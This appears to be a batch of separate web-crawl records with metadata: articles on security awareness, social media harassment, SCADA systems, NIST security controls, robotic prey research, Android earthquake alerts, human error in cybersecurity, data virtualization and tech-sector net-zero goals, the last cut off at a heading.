In the future, every user will need to know much more about computers and the Internet. In the late 1980s when personal computers started to be universally used, some people were excluded because they did not make the move. We face a similar model with computer behavior. Future workers will have to have secure behavior embedded in their habits or else they will not work at all. Would you hire someone who would click on an email with Paris Hilton on it? I predict that today’s type of awareness programs will become irrelevant when people know how to deal with current problems. Not because of outstanding security awareness programs, but because of the issues each of them will have faced in their everyday experiences. The human firewall is building itself, regardless of the awareness program effort. | <urn:uuid:9e584ce7-d5b5-4d7b-b36c-1694c0dc999b> | CC-MAIN-2024-38 | https://www.ciscopress.com/articles/article.asp?p=663084&seqNum=2 | 2024-09-16T15:08:52Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.45/warc/CC-MAIN-20240916144317-20240916174317-00792.warc.gz | en | 0.956742 | 583 | 2.65625 | 3 |
Some conversations on social media can get … heated. Some can cross the line into harassment. Or worse.
Harassment on social media has seen an unfortunate rise in recent years. Despite platforms putting in reporting mechanisms, policies, and even using AI to detect and remove harmful speech, people are seeing more and more harassment on social media.
Yet even as it becomes more prevalent, nothing about it is usually. Or acceptable. No, you can’t prevent social media harassment. Yet you can protect yourself in the face of these attacks.
Online harassment statistics continue to climb.
In 2023, research showed that 52% of American adults said they experienced harassment at some point online. That’s up from 40% in 2022. Also in 2023, 33% said they experienced it in the last year, a jump of 10% from 2022.i
The same trend follows for teens, where 51% of them said they experienced harassment in the past year, compared to 36% in the year prior.ii
Earlier research conducted in the U.S. tracked a significant rise in harassment online between 2014 and 2020. This included the doubling or the near doubling of the most severe forms of online harassment.iii
Our own research in 2022 also noted a rise of another kind — worry about online harassment. Globally, 60% of children said they were more worried that year about social media harassment (cyberbullying) compared to the year prior. Their parents showed yet more concern, with 74% of them more worried that year about their child being harassed than the last.iv
The human cost of social media harassment.
Stats are one thing, yet behind each figure stands a victim. Harassment takes a hard toll on its victims — emotional, financial, and sometimes physical. That becomes clear the moment you look at the forms it can take.
Social media harassment includes:
- Flaming — Online arguments that can include personal attacks.
- Outing — Disclosing someone’s sexual orientation without their consent.
- Trolling — Intentionally trying to instigate a conflict through antagonistic messages.
- Doxing — Publishing private or identifying info without someone’s consent.
- Cyberstalking — Collecting info and tracking the whereabouts of a victim in a threatening way.
- Identity Theft — Stealing a victim’s accounts or posting messages posing as them online.
It includes other acts, such as:
- Spreading false rumors.
- Sending explicit images or messages.
- Threats of physical harm.
In practice, the results can get ugly. Scanning press releases from various state attorneys general, you’ll find unflinching accounts of harassment. Like a targeted, three-year cyberstalking campaign against a victim and that person’s parents, coworkers, siblings, and court-mandated professionals.v Another, where the harasser attempted to defame his victim through a fake LinkedIn profile — and further doxed his victim by publicly posting source code the victim had written worth millions of dollars.vi
All of this serves as a reminder. Harassment can quickly turn into a crime.
How to protect yourself from harassment on social media.
The unfortunate fact remains that you can’t prevent social media harassment. Some people simply find themselves driven to do it. You can take several steps to shield yourself from attackers and deny them the info they need to fuel their attacks.
Secure your accounts.
Account security should be a high priority for you, your loved ones, and anyone else. That’s especially true during periods of harassment. Every account you have should be secured with a complex password — at least 12 to 14 characters long, with numbers, capital letters, lowercase letters, and symbols. And with two-factor authentication.
Two-factor authentication is especially important when it comes to account security. The reason is simple: a lot of harassers are tech-savvy, and enjoy taking over a victim’s account to make offensive comments in their name and damage their reputation.
Two-factor authentication prevents account takeovers like this. It requires a user to know the password and username for an account, along with another way they can prove they are who they say they are. Often that involves a code sent to their smartphone that they can use to verify their identity. At McAfee, we recommend you use two-factor authentication on any account that offers it.
Control who can follow you.
Social media platforms offer plenty of ways you can lock down your privacy, even as you remain “social” on them to some degree. Our Social Privacy Manager can help you be as private as you like. It helps you adjust more than 100 privacy settings across your social media accounts in only a few clicks, so your personal info is only visible to the people you want to share it with. By making yourself more private, you deny a potential harasser an important source of info about you, in addition to your friends, family, and life overall.
Limit what you share online.
Limit how much info you share about yourself on social media websites. Addresses, phone numbers, and locations shouldn’t be shared in posts and shouldn’t be included in biographies. Attackers can use this type of info to make false threats and, in some cases, falsify crimes to elicit a police response — this is a technique called “SWATTING” and it’s quite serious.vii
In some instances, harassers gather info about their victims on data brokers or “people finder” sites. Some of this info can get pretty detailed, and these sites will sell it to anyone. You can clean up that info, however. Our Personal Data Cleanup scans data broker sites and shows you which ones are selling your personal info. It also provides guidance on how you can remove your data from those sites — or remove it for you, depending on your plan.
Harassed on social media? Here are the steps to take.
Report the harassment to the social media platform.
If you find yourself targeted, don’t respond. That’s what the harasser wants. Use your social media platform’s tools to block and then report the harasser. Many platforms have web pages dedicated to harassment that walk you through the process.
Report harassment to the authorities.
First off, if you feel that you are in immediate danger, contact your local authorities for help.
In many cases, harassment is illegal. Slander, threats, damage to your professional reputation, doxing, and many of the examples mentioned earlier can amount to a crime. There are options for victims, legally speaking. If you feel a harassment campaign has crossed the line, then it’s time to contact the authorities. Bring proof of harassment. Take screenshots of everything and submit them as part of your complaint.
Talk with trusted family members and friends.
We’ve seen just how damaging and painful harassment can be. Let trusted people in your life know what’s happening. Lean on them for support. And have them help you find any resources you might need in the wake of harassment, such as counseling or even legal assistance. You might find this tough to do, yet realize that you’re not at fault here. Any ugliness you’re dealing with comes from the hands of a harasser. Not yours. Close family and friends will recognize this. | <urn:uuid:70eae74c-895a-4a50-9a16-71d5b5391d54> | CC-MAIN-2024-38 | https://www.mcafee.com/blogs/internet-security/the-rising-threat-of-social-media-harassment-heres-how-to-protect-yourself/ | 2024-09-17T22:07:58Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.53/warc/CC-MAIN-20240917204739-20240917234739-00692.warc.gz | en | 0.944115 | 1,541 | 2.53125 | 3 |
What is SCADA?
Supervisory Control and Data Acquisition, commonly known as SCADA, is an automated control system used in modern electrical systems to help drive more efficient operations. SCADA systems are designed to collect data from critical assets via sensors installed within equipment across an organization. Data can be processed and analyzed, and the output can be used to enable personnel to make, better, more informed decisions about the best course of action with their assets.
SCADA systems consist of software and hardware components that enable operators to gather data to efficiently monitor, control, and optimize electrical assets. These systems provide remote control for equipment monitoring processes, performance aberrations, and data analysis.
How does SCADA work?
Communication networks are the backbone that connects components such as sensors, RTUs (Remote Terminal Units), PLC’s (Programmable Logic Controllers), and the central controls in SCADA systems. These communication networks ensure data flows seamlessly between field devices and peripheral systems, enabling real-time monitoring and control.
Operational efficiency and electrical asset reliability are enhanced when a SCADA system is connected to equipment. The system can collect varying types of data from equipment, including temperature, pressure, or speed data. The data may then be analyzed and presented in a dashboard, and trends can be determined.
Such insights may then be used to take broader actions, allowing personnel to make better decisions.
A typical SCADA system will comprise several components, which include:
- Sensors and Actuators: Sensors provide the necessary data from measured parameters like pressure, flow, voltage, temperature, and so on for monitoring, while actuators receive control signals from the sensors to enable automated control capabilities for operational adjustments and optimization. These are crucial components of SCADA systems for real-time feedback on process performance.
For example, if a sensor detects a high temperature trend, an actuator can be triggered to turn on a cooling system.
- Remote Terminal Units (RTUs): RTU’s collect real-time data from sensors connected to their input modules and forward the processed data to the central SCADA system over the preferred communication channel. This data is forwarded regularly or when significant changes occur, ensuring the central control system has up-to-date information.
- Programmable Logic Controllers (PLCs): PLC’s allow direct control of machinery and processes based on sensor data. The PLC receives control commands from the SCADA system based on processed data, which then adjusts the actuator's control actions to make the necessary changes, such as opening or closing valves, starting or stopping motors, or adjusting flow rates.
For example, if the SCADA system detects an anomaly or a need to make an adjustment, it sends signals to the PLC that trigger relevant actuators to make the necessary changes.
- Communication Networks: Networks connect the sensors, RTUs (Remote Terminal Units), PLC’s, and the central control system. These networks allow for remote monitoring and a seamless flow of data between field devices and the SCADA system, enabling real-time monitoring, control, and automation of industrial processes. In other words, communication networks facilitate data collection, transmission, processing and display, control commands, and action implementation.
- Human Machine Interface (HMI's): these are the user interfaces or dashboards that enable personnel interaction with a machine, system, or device with data visualization and trend analysis of the various monitored and controlled processes. HMI's also provide real-time visual or audible notifications when process parameters deviate from the predefined acceptable range.
Automated reports on system performance can be generated by HMI’s that could be scheduled or triggered by defined events. | <urn:uuid:837ca400-fafb-4290-afaa-046948be0a2c> | CC-MAIN-2024-38 | https://blog.exertherm.com/how-scada-revolutionizes-electrical-asset-management | 2024-09-08T06:28:31Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650960.90/warc/CC-MAIN-20240908052321-20240908082321-00692.warc.gz | en | 0.886947 | 757 | 3.625 | 4 |
The National Institute of Standards and Technology (NIST) has released its final report on cybersecurity recommendations for the federal government.
NIST teamed up with DoD and other agencies in the Intelligence Community (IC) to find common security solutions for agencies and contractors.
While conducting their work, officials identified solutions for securing cyber networks, but also examined new threats related to IT — and the country’s overall infrastructure — that didn’t exist years ago.
Ron Ross is with NIST’s computer security division and worked on the project and explained more during Thursday’s Daily Debrief.
“We call this document an historic document in the sense that we’ve been working for the last couple of years with our counterparts over in the Intelligence Community, through the Office of the Director of National Intelligence and the Defense Department, to try to look at the various sets of security controls that were being used by the three communities of interest, to include the civil side that NIST represents. It turns out that, for the vast majority of controls that were used in all three communities, we had a lot of overlap. There was a lot of commonality amongst what we were doing.”
Ross said this realization enabled the researchers to develop a catalogue based on a foundation created by NIST. Those on the project added controls specific to the IC and DoD.
NIST does not mandate the additional controls for national security; rather, Ross said, the specific controls are in the catalogue and can be used by any community that wants additional security.
“In the [IC] and [DoD], the committee on National Security Systems (CNSS) is working on a companion publication that will point to the control catalogue . . . and then [any community] can pick whatever controls they want out of the catalogue they feel are appropriate, and mandate those controls for their particular communities of interest. So it’s really the best of all worlds.”
Ross said NIST, the IC and DoD all take advantage of each other in order to make sure the best controls are developed for a world-wide customer base.
“The vast majority of the controls, whether they’re management, operational or technical in nature, are common to the entire federal community. Where we tend to diverge would be in the cryptography areas. The national security systems may require a stronger grade or higher cryptography. The personnel security in the DoD and [IC] tend to have higher security clearances . . . and the physical security tends to be a little bit stronger around those facilities that have national security systems. But, if you take out those three areas, almost everything else we have pretty much in common with the other communities.”
Ross said, overall, this most recent document doesn’t contain many surprises, though new challenges appeared when compared to years ago.
In addition, many security fundamentals are reiterated, though they have been updated for today’s modern, more complex systems.
“Literally we have millions of lines of code in the operating systems, the middleware, the applications — all riding on a bed of integrated circuits. It’s an extremely complicated undertaking. It’s always very difficult to figure out where to apply the appropriate security controls, the number of controls, the rigor, the assurance level of those controls, how good those controls are — [it is] very difficult in an environment where you have this type of complexity. Also, everything is connected to everything else today.”
That environment of connectivity, whether it be between agencies, agencies and state and local governments, or agencies and the private sector, presents its own set of challenges, as well.
“There were no real surprises. The attacks continue to get better and better. You can download very sophisticated attack tools from the Internet now and you can launch those attacks with very low cost laptop computers. So, the attack potential is there and there’s lots of smart people out there who are continuing to try and figure out how to break into the systems. Our job on the defensive side is to try and anticipate those types of attacks and close them down as soon as we can.”
Ross added that another, more intangible challenge was identified.
“Our increasing independence on information technology. . . . This dependence on the technology and the ability the adversaries to attack specific places in the system give us great concern — especially in things like critical infrastructure, where you have electric power grids, water distribution systems, first responders that are depending on this technology for their mission and business success. We worry not only about the attacks bringing down significant portions of the infrastructure, we also worry about the opposite extreme — where the adversaries will implant malicious code into the systems, fully intending to keep those systems operational, but exfiltrating critical data out the back end.”
The recent cybersecurity document is only one of several that NIST is working on. | <urn:uuid:19ddd56c-83c6-4338-8bc3-ca5894e6dc7b> | CC-MAIN-2024-38 | https://federalnewsnetwork.com/defense/2009/08/nist-releases-final-cybersecurity-recommendations/ | 2024-09-08T05:41:18Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650960.90/warc/CC-MAIN-20240908052321-20240908082321-00692.warc.gz | en | 0.961701 | 1,017 | 2.515625 | 3 |
Researchers Use Robotic Prey to Track Predator Behavior
The findings work to better inform understandings of predator behavior
A new study from the University of Bristol used robots to investigate how predators react to unpredictable movements from prey – testing a long-held theory that erratic movements can help animals escape an aggressor.
The team from Bristol’s School of Biological Sciences studied how blue acara cichlids responded to robotic prey that was programmed to move in certain patterns to escape, while monitoring the predators’ reaction to random versus predictable movements.
“Using robotic prey allowed us to present individual predators with one of two prey escape strategies: ‘predictable’ prey which repeatedly escaped in the same direction from one interaction with the predator to the next, or ‘unpredictable’ prey which escaped in random directions,” said lead author Dr Andrew Szopa-Comley.
The results disproved the theory. Instead demonstrating how predators can adapt their movements to neutralize their preys’ random pathways, accelerating in the later stages of their hunt to compensate for time lost in assessing the bot’s movements.
“Our results suggest that the predators in our study were able to overcome the potential downsides of facing prey which behave unpredictably,” said senior author Dr. Christos Ioannou. “From the prey’s point of view, this raises the question of whether unpredictable behavior is as widely beneficial as was originally thought.”
Results from the study were published in June in the science journal PNAS.
About the Author
You May Also Like | <urn:uuid:c644a965-e927-4778-b31c-244b23b84ac2> | CC-MAIN-2024-38 | https://www.iotworldtoday.com/robotics/researchers-use-robotic-prey-to-track-predator-behavior | 2024-09-09T12:25:55Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651098.19/warc/CC-MAIN-20240909103148-20240909133148-00592.warc.gz | en | 0.941024 | 330 | 3.828125 | 4 |
Google is shaking things up: Android expands earthquake alerts to all U.S. states
Android users across the United States now have access to early earthquake warnings, as the Android Earthquake Alerts System expands to cover all 50 states and six U.S. territories. This system, which has been instrumental in providing life-saving alerts in California, Oregon, and Washington, is being rolled out nationwide, with the deployment set to be completed in the coming weeks. This expansion ensures that millions more people are prepared when an earthquake strikes.
Since its launch in 2020, the Android Earthquake Alerts System has relied on partnerships with the United States Geological Survey (USGS), California Governor's Office of Emergency Services (CalOES), and the ShakeAlert system to deliver accurate and timely alerts based on data from traditional seismometers. To extend these early warnings to areas without the USGS ShakeAlert system, Android phones themselves have been turned into mini seismometers.
Using the built-in accelerometers in Android devices, the system detects vibrations that may indicate an earthquake. When multiple phones in an area detect similar shaking, the system analyzes this crowdsourced data to determine whether an earthquake is occurring.
If the shaking is determined to be from an earthquake, the system sends out one of two alerts based on the magnitude: a "Be Aware" alert for weak or light shaking, or a "Take Action" alert for moderate to extreme shaking, prompting immediate action to protect oneself. In addition to these alerts, users can find real-time earthquake information by searching "Earthquake near me" on Google.
The Android Earthquake Alerts System is continuously being refined through collaboration with experts like Dr. Lucy Jones and Dr. Jeannette Sutton, as well as organizations like the Global Disaster Preparedness Center (GDPC). By working closely with these experts and analyzing data from seismic events, Google aims to enhance the accuracy and effectiveness of its earthquake alerts. | <urn:uuid:5f46ceb8-0af4-49aa-ace8-4336cf60b720> | CC-MAIN-2024-38 | https://betanews.com/2024/09/03/google-android-earthquake/ | 2024-09-11T22:14:35Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651405.61/warc/CC-MAIN-20240911215612-20240912005612-00392.warc.gz | en | 0.931967 | 391 | 2.578125 | 3 |
- Human mistakes continue to be the root cause of data breaches. Habit, bias, and the status-quo interfere with our ability to realistically assess cybersecurity risks.
- The U.S. government is escalating efforts to address both workforce shortages and sophisticated cyberthreats by spearheading organizational change that prioritizes collaboration, inclusion, transparency, and crowdsourcing of innovation.
- With exponentially increasing data and a shift to Zero Trust, automation is a necessity to reduce human stress and mistakes from data overload, while also improving decision-making and increasing job satisfaction.
The recent hacking of Uber by a teenager, reported to be affiliated with the notorious Lapsus$ teen hacker gang, demonstrates once again how a single employee’s distracted decision, when targeted by a psychological attack, is a major risk factor. The hacker broke in by compromising a contractor’s multifactor authentication (MFA) using MFA bombing to fatigue the contractor until the victim approved the request. Breaches exploiting weak security tools and social engineering continually play out in the news spawned by nation-state threat actors, ransomware gangs, and teen hackers like Lapsus$.
Psychologists ask their patients to look beyond external negative symptoms and become aware of internal root causes. This process uncovers fixed and inaccurate mental rules (biases) that are being relied on that can lead to detrimental outcomes. However, complacency can be changed through communication, education, and awareness – from the leadership level all the way down to the user level.
Human mistakes are a major cause of data breaches. Yet many organizations continue to assume (despite evidence to the contrary) that staff:
- are well-educated about cyber risks
- know how to prioritize cybersecurity alongside completing job tasks
- feel their efforts are valued and can safely give feedback
- optimize security tools that may not be user-friendly, even when distracted by people and daily tasks
Human decisions are often made quickly based on habits and bias from past experiences due to pressures from:
- social conformity (two-way feedback is not encouraged)
- social norms and time constraints (get your job done)
- apathy over the status-quo (we’re stuck using tools and processes that don’t work well)
- “accepted wisdom” (such as multifactor authentication is secure and prevents breach)
Unless leadership takes an honest look at the internal rules, tools, and policies that create apathy, confusion, stress, and mistakes, employees will continue to default to habit in order to get their job done. Enterprise cybersecurity risk is a different animal than other kinds of risks. For example, weather can be a risk but it doesn’t psychologically target your staff with persistence and ever-evolving sophisticated tactics.
How do you increase adaptation and compliance, dispel complacence, and support user-friendly Zero Trust policies and tools that actually engage and empower employees, rather than relying on punitive, aggravating measures?
Cognitive bias, power hierarchies, and lack of clear communication, collaboration, and feedback are underlying root causes of human mistakes that create serious cybersecurity risks. Check out our recent articles on the important topics of cyber resilience, human bias, collaboration, and innovation:
- Cyber resilience requires managing human risks and leveraging innovation and automation
- Three ways to reduce cybersecurity risk: bias education, collaboration, and intelligent automation
When it comes to change, leadership must set the example, promote honest feedback, and be accessible. Teri Green, a former CISSP Chief Information Officer at Normandy Schools Collaborative and founder of her own cybersecurity firm, said that to help her team cope with difficulties she began leading daily mindfulness sessions, according to the article “Using Mindfulness and Authenticity to Lead Tech Teams.“
Green said she believes we have to push ourselves and, “I’m a firm believer that life begins at the end of your comfort zone.” She emphasized:
“When considering how people decide to do one thing or another, it all comes down to seeing and believing. When leaders show up, they need to show up as the individual they wish to see.”
If cybersecurity is a top concern of your organization, then your employees must see it and feel it by the inclusive actions of your leadership. These actions may include cross-departmental collaborations and feedback, funding user-friendly automation that reduces tedious work, stress, and mistakes, or by making cyber awareness an ongoing and meaningful part of your culture and personally relevant in daily decision-making.
For example, Washington, D.C.-based Children’s National Hospital implemented a code that signals staff to unplug or turn off internet-connected devices to mitigate cyberattacks. Nurses, physicians, and staff members are educated and empowered to look for suspicious activity on technology devices and then report it to the hospital security staff, who would would then send the “code dark” signal to all staff. All hospital staff members carry cards with “code dark” steps on lanyards.
A National Need to Change Organizational Dynamics
The serious nature of cyberthreats has brought our nation to the point of recognizing there have been systemic and mental biases hindering information and idea flow between individuals, organizations, and hierarchies.
The newly released Cybersecurity and Infrastructure Security Agency’s (CISA) 2023-2025 Strategic Plan is working to break down barriers and hierarchies in order to promote a new model for innovative collaborations. A few of the stated key areas of focus include:
- “CISA must lean forward in our cyber defense mission toward collaborative, proactive risk reduction. Working with our many partners, it is CISA’s responsibility to help mitigate the most significant cyber risks to the country’s National Critical Functions, both as these risks emerge and before a major incident occurs.
- We will strengthen whole-of-nation operational collaboration and information sharing. At the heart of CISA’s mission is partnership and collaboration … We will succeed because of our people. We are building a culture of excellence based on core values and core principles that prize teamwork and collaboration, innovation and inclusion, ownership and empowerment, and transparency and trust.”
The White House also released the Strategic Intent Statement for the Office of the National Cyber Director (ONCD), focusing on collaboration and innovation between the public and private sector, which states:
- “Individual cyber hygiene is important and personally laudable, but systemically inadequate … [The ONCD] will improve public-private collaboration to tackle cyber challenges across sectoral lines. It will align resources to aspirations by ensuring U.S. departments and agencies are resourcing and accounting for the execution of cyber initiatives, assets, and talent entrusted to their care, and considering all possible future such requirements …
- We must “crowdsource” our ability to identify and stop transgressors in much the same way they crowdsource their exploitation of us.”
Key phrases from the two plans above are “innovation and inclusion, ownership and empowerment” and “crowdsource” for innovation. For too long there has been implicit bias around a belief that good ideas come from having the “right” educational background, experience, or titles. Now with the Great Resignation, looking outside normal hiring channels is critical to fill the cybersecurity workforce shortage.
Young hackers have become a force to be reckoned with and it’s worth considering how their abilities can be proactively mentored and validated in positive ways. The Lapsus$ teen gang has been behind many major breaches like Uber. On the flipside, former teen hacker Marcus Hutchins turned from the dark side to become a Jedi-like white hat hacker and personally stopped the 2017 global WannaCry ransomware attack in just hours.
Maybe we need people like Marcus Hutchins performing outreach on the dark web to help lead misguided, attention-seeking hackers into the light (hackers and their families need critical infrastructure like utilities, water, and hospitals too). It’s time we consider new ways to crowdsource talent and innovation by looking beyond college graduates, long resumes, and organizational hierarchy. Our world may depend on it.
Breaking through barriers means you approach problems with curiosity and a willingness to experiment and do things different – just as athlete and student Roger Bannister did in 1954 when he broke the four-minute mile when people thought it was impossible. Bannister researched the mechanics of running and trained using new scientific methods he developed. He went on to become a neurologist.
Removing organizational barriers to positive change must include reducing rigid mental bias, information blindness, and inertia that lead to poor decisions. Collaboration and crowdsourcing can help to identify innovative tools and policies needed to improve cybersecurity.
The Importance of Human-in-the-Loop Automation
With growing masses of data being generated in the world today and staffing shortages, solutions that use automation are necessary to implement Zero Trust. Automation will help identify and properly process and protect essential data. Automating tedious tasks reduces human mistakes from data overload, and can also increase job satisfaction with humans focused on higher-level strategic and creative tasks.
In reality, “human-in-the-loop” automation has existed for thousands of years. The first water wheels for crop irrigation, grinding grains, and supplying village water date back to ancient Rome. Today, washing machines, lawn mowers, cars, and indoor plumbing all help automate daily tasks for humans.
A current big area of development in data and process automation is artificial intelligence (AI) and machine learning (ML). However, understanding its benefits and risks can be confusing because those are blanket terms describing a number of different, developing technologies that have cybersecurity applications. It is important that as a nation we define beneficial use cases of AI/ML automation while also clearly delineating where AI could become a cyber risk itself.
Regarding risks, there are concerns over how some forms of AI are being ethically developed and how cyber attackers are using it. These are valid concerns because individual humans program AI. Each of us has our own values, and other nations or cybercriminals also have their own value systems. All of these value systems are very diverse and contain much bias.
No one has conclusively described cognition. Researchers and psychologists continue to broaden cognition to expanded ideas around identity and how we make decisions. Some of these research areas include quantum cognition and embodied cognition. If we don’t fully understand how our own minds, bodies, intuition, and feelings work together, a human-programmed AI may not behave in the way we expect.
In fact, the National Institute of Standards and Technology (NIST) has created several discussion documents and has been asking for feedback on AI risks, specifically to examine the often hidden risks of human and systemic biases that could be programmed into AI.
Check out the important document, NIST Special Publication 1270 – Towards a Standard for Identifying and Managing Bias in Artificial Intelligence, which shows an iceberg representing below-the-waterline, Titanic-style human and systemic bias that is overlooked.
Autonomous AI that is programmed to take action for us is a cyber risk, conjuring up ideas of movies like The Terminator or The Matrix. An AI programmed to be efficient might not be counterbalanced with human traits that know efficiency is not the correct path in every situation. In fact, the article “Will Artificial Intelligence make humanity irrelevant?” outlines why AI can’t, and should not, take the place of human oversight and decision-making.
It is of vital importance that humans remain “in-the-loop” and not release AI on its own recognizance. We should be concerned if any nation or threat actor is planning on releasing some type of autonomous AI onto connected networks that could spread like a digital pandemic.
The AI described above is different from intelligent automation technologies that are available now that have important benefits, including human-controlled data and process automation technology. Just like how washing machines and modern plumbing automate laborious tasks, AI/ML data processing automation (with a human-in-the-loop) can be very helpful in reducing tedious tasks to free up human time to focus on the big picture and creatively solve problems.
AI/ML data discovery and classification and intelligent document processing allow security and data management staff to index petabytes of unstructured and structured data in order to identify, assess, tag, workflow, and correct risks in your data estate. Some security technologies also use AI to remove false positives and provide more accurate modeling. All of these technologies are of real value to automate monotonous, mistake-prone data tasks and allow humans-in-the-loop to make faster and more informed real-time decisions.
Two recent reports were developed on how to implement Zero Trust and both identify challenges that illustrate the usefulness of automation for data visibility, inventory, and management.
The first is the Draft Report on Zero Trust and Trusted Identity Management from the President’s National Security Telecommunications Advisory Committee. John Kindervag, who helped define Zero Trust while at Forrester Research, was among industry leaders who wrote the report as part of the committee.
According to this report:
“some federal agencies (and many private sector organizations) lack basic visibility of the data, assets, applications, and services in their organization, and as a result, are not yet ready to begin their Zero Trust journey”
The World Economic Forum created a community white paper, “The ‘Zero Trust’ Model in Cybersecurity: Towards Understanding and Deployment“ that aims to demystify zero trust. One challenge it points out is:
“[Zero Trust] requires organizations to have a detailed inventory of applications, data assets, devices, networks, access rights, users and other resources.
The paper goes on to say, “However, in order to know what to verify, cyber leaders need to clearly identify what the “crown jewels” are that they need to protect. To that end, an essential part of the shift to Zero Trust is understanding and mapping the valuable critical data, assets, devices (such as laptops, smartphones and IoT devices) and other resources.”
Identifying and understanding all your data assets is a foundational step in ensuring that they are both protected and that staff are using quality data sources – “true data” – when making important decisions. Recent Forrester research also found that not doing sufficient data discovery and classification caused Zero Trust microsegmentation project failures.
A healthy organization should be using data discovery and classification to perform a baseline inventory and assessment of data assets to identify and remove hidden risks to essential data used for decision-making. It’s also critical that after baseline you continuously monitor the data estate for changes that might affect data safety or usability.
Understanding what’s in your data estate, identifying past data-handling mistakes, reducing PII and business intelligence risks, and organizing data for quality analytics will help your organization make more informed data-based decisions going forward that support future growth.
Do you know what and where all your data is? Can you monitor changes to your data estate? Is there unencrypted business intelligence or PII data that should be protected? Do you have legacy and over-retained data that should be moved or deleted? Are analytics solutions incorporating all important data?
Comprehensive AI/ML data discovery and classification and intelligent document processing enable safer digital transformation by indexing all unstructured and structured data living in your data stores. Manage your data estate with tagging, filters, and federated search to correct mistakes and misfiled data, protect any exposed business intelligence or PII, and empower your data analytics solutions. Keep it that way going forward with ongoing, automated monitoring.
This article is an updated version of a story that appeared in Anacomp’s weekly Cybersecurity & Zero Trust Newsletter. Subscribe today to stay on top of all the latest industry news including cyberthreats and breaches, security stories and statistics, data privacy and compliance regulation, Zero Trust best practices, and insights from cyber expert and Anacomp Advisory Board member Chuck Brooks.
Anacomp has served the U.S. government, military, and Fortune 500 companies with data visibility, digital transformation, and OCR intelligent document processing projects for over 50 years. | <urn:uuid:d5d00c63-d541-4421-8b11-e9d20ec820c6> | CC-MAIN-2024-38 | https://dev.anacomp.com/the-root-causes-of-cybersecurity-risk-and-how-automation-can-help/ | 2024-09-11T23:21:55Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651405.61/warc/CC-MAIN-20240911215612-20240912005612-00392.warc.gz | en | 0.932206 | 3,365 | 2.53125 | 3 |
While Big Data Analytics has become all the rage over the past few years, another technology also has entered the mainstream: Data Virtualization.
Data Virtualization is the process of abstracting different data sources through a single data access layer which delivers integrated information as data services to users and applications in real-time or near real-time. Stated in terms that IT leaders and integration architects can use with their business colleagues, data virtualization ensures that data is well integrated with other systems so that enterprises can harness big data for analytics and operations.
Today, data virtualization tools have become mature enough so that corporations are adopting them to lower the costs of traditional integration (through writing custom code, ETL, and data replication processes). The tools also allow for increased flexibility for data warehouse prototyping or extensions. Because data virtualization exposes complex big data results as easy-to-access REST (representational state transfer) data services, data virtualization tools make it possible to integrate data between enterprise and cloud applications.
The technology also simplifies data access in three steps: by connecting and abstracting sources, combining them into canonical business views, and lastly publishing them as data services. In this way it is similar to server, storage, and network virtualization in that it simplifies the appearance of what is being managed for users while under the covers it employs technologies for abstraction, decoupling, performance optimization, and the efficient use (or re-use) of scalable resources.
Unlike hardware virtualization, data virtualization deals with information and its semantics – any data, anywhere, any type – which can have a more direct impact on business value.
With enterprise analytics, you need both big data and access to that data to create real value. Big data involves distributed computing across standard hardware clusters or cloud resources, using open source technologies such as Hadoop, Amazon S3 and Google Big Query. Data virtualization can be part of this picture, too. In its report, “Data Virtualization Reaches Critical Mass,” Forrester Research says, “Integration of big data expands the potential for business insight” and cites this potential as a driver for data virtualization adoption.
Data virtualization can help organizations to extract value from large data volumes efficiently, and perform intelligent caching while minimizing needless replication. It has also enabled companies to access many data source types by integrating them with traditional relational databases, multi-dimensional data warehouses and flat files so that BI users can conduct queries against the combined data sets. For example, a leading crop insurer has used data virtualization to expose its big data sources and integrate them with its transactional, CRM and ERP systems to deliver an integrated view of sales, forecasts and agent data to its sales team. Using data virtualization, these complex reports could be developed much faster, using fewer staff resources than in the past.
Data virtualization represents a straightforward way to deal with the complexity, heterogeneity and volume of information coming at us, while meeting the needs of the business community for agility and near real-time information. IT will need to adapt to this reality or become less relevant as business owners increasingly drive technology decisions.
Go to source at Data Informed
- Data Governance in a Data Mesh or Data Fabric Architecture - December 21, 2023
- Moving to the Cloud, or a Hybrid-Cloud Scenario: How can the Denodo Platform Help? - November 23, 2023
- Logical Data Management and Data Mesh - July 20, 2023 | <urn:uuid:ba09a557-0bd9-4c01-b097-9c0fcda46cff> | CC-MAIN-2024-38 | https://www.datamanagementblog.com/data-virtualization-big-data-analytics/ | 2024-09-13T06:16:04Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00292.warc.gz | en | 0.929619 | 713 | 2.859375 | 3 |
How IT can help tech companies to reach Net Zero
19 Sep, 20233 minsSince the Paris Agreement was signed in 2015, achieving ‘net zero’ has become a globally rec...
Since the Paris Agreement was signed in 2015, achieving ‘net zero’ has become a globally recognised goal. The Agreement underlines the need for net zero and requires states to ‘achieve a balance between anthropogenic emissions by sources and removals by sinks of greenhouse gases in the second half of this century’. In basic terms, this means achieving a balance between the carbon emitted into the atmosphere, and the carbon removed from it.
When it comes to CO2 emissions, this is the state at which global warming stops.
The UK Government’s has since set out its own Net Zero Strategy which outlines a roadmap as to how the country will unlock £90 billion in investment to reach ‘net zero’ emissions by 2050.
To reach net zero, emissions from areas such as homes, transport, and agriculture will need to be cut, and sectors will have to reduce the amount of carbon they put into the atmosphere. For industries which rely on a high carbon output to stay afloat, this goal means drastically changing how their sectors operate.
The tech sector, in particular, faces unique challenges in reaching net zero emissions, such as the exponential growth in demand for data services, difficult-to-mitigate production methods, and huge supply chains, all of which contribute to a high carbon output. However, many companies within the sector have chosen to make their own environmental commitments – setting deadlines, writing pledges into policy and streamlining their major emitters.
Cisco is one of them. In 2021, the company made a commitment to reach net zero across all scopes of emissions by 2040, which includes product use, operations, and supply chains.
Its plan involves:
- Continuing to increase the energy efficiency of products and solutions.
- Further embedding circular economy principles across the business.
- Accelerating the use of renewable energy.
- Embracing hybrid work.
- Investing in innovative carbon removal solutions.
What role does IT play?
